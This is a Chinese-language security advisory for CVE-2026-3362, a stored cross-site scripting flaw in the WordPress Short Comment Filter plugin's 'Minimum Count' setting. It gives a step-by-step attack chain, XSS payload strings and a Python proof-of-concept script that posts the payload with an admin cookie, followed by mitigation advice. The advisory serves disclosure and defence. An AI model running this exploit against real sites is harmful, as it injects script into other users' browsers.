CVE-2026-3362 CVSS 4.4 中危

CVE-2026-3362: Short Comment Filter插件存储型XSS漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3362

漏洞类型

存储型跨站脚本

CVSS评分

4.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WordPress Short Comment Filter 插件

漏洞概述

WordPress Short Comment Filter插件在所有版本（包括2.2）中存在存储型跨站脚本漏洞。由于'Minimum Count'设置字段缺乏输入清理和输出转义，拥有管理员及以上权限的攻击者可在设置页面注入恶意脚本。当用户访问该页面时，脚本将被执行，在多站点安装或限制未过滤HTML的环境中影响尤为严重。

技术细节

该漏洞位于插件设置页面的“Minimum Count”参数处理逻辑中。开发者在调用register_setting()注册设置时，未指定sanitize_callback，导致用户提交的数据未经过滤即通过update_option()存入数据库。在设置页面渲染阶段，代码直接将存储的选项值回显到HTML输入标签的value属性中，且未使用esc_attr()函数进行必要的HTML实体转义。这种输入验证缺失与输出编码不足的组合，使得具有管理员权限的攻击者可以构造包含恶意JavaScript代码的Payload并保存。当其他用户访问该设置页面时，Payload将在浏览器上下文中解析执行，导致存储型XSS攻击。在WordPress多站点模式下，此风险尤为显著。

攻击链分析

STEP 1

步骤1：获取访问权限

攻击者获取WordPress站点的管理员级别账户凭证。

STEP 2

步骤2：导航至设置页面

攻击者登录后台，进入Short Comment Filter插件的设置页面。

STEP 3

步骤3：注入恶意载荷

攻击者在'Minimum Count'输入框中输入构造好的XSS Payload（例如："><script>alert(1)</script>），并保存设置。

STEP 4

步骤4：存储恶意数据

由于缺乏输入清理，恶意脚本被保存到WordPress数据库的options表中。

STEP 5

步骤5：触发漏洞

当其他用户（特别是管理员）访问该设置页面时，服务器从数据库读取未转义的数据并渲染到HTML属性中，导致脚本在受害者浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Exploit Title: Short Comment Filter <= 2.2 Stored XSS
# Description: Injecting XSS payload via the 'Minimum Count' setting.
import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin.php?page=short-comment-filter-settings"
admin_cookie = "wordpress_logged_in_admin_cookie_value"

# Malicious payload to be stored
# The payload closes the value attribute and injects a script tag
xss_payload = '"><script>alert("XSS");</script>'

# Data payload for the POST request
post_data = {
    "action": "update",
    "option_page": "short_comment_filter_options",
    "_wpnonce": "[FETCH_NONCE_FROM_PAGE]", 
    "_wp_http_referer": "/wp-admin/admin.php?page=short-comment-filter-settings",
    "minimum_count": xss_payload
}

headers = {
    "Cookie": f"wordpress_logged_in_...={admin_cookie}"
}

# Send the request to store the payload
response = requests.post(target_url, headers=headers, data=post_data)

if response.status_code == 200:
    print("Payload potentially stored. Visit settings page to trigger XSS.")
else:
    print("Failed to send request.")

影响范围

Short Comment Filter <= 2.2

防御指南

临时缓解措施

在未升级插件之前，建议暂时禁用Short Comment Filter插件。如果必须使用，应确保只有受信任的管理员能够访问插件设置页面，并在服务器端实施Web应用防火墙（WAF）规则以拦截潜在的恶意脚本注入请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表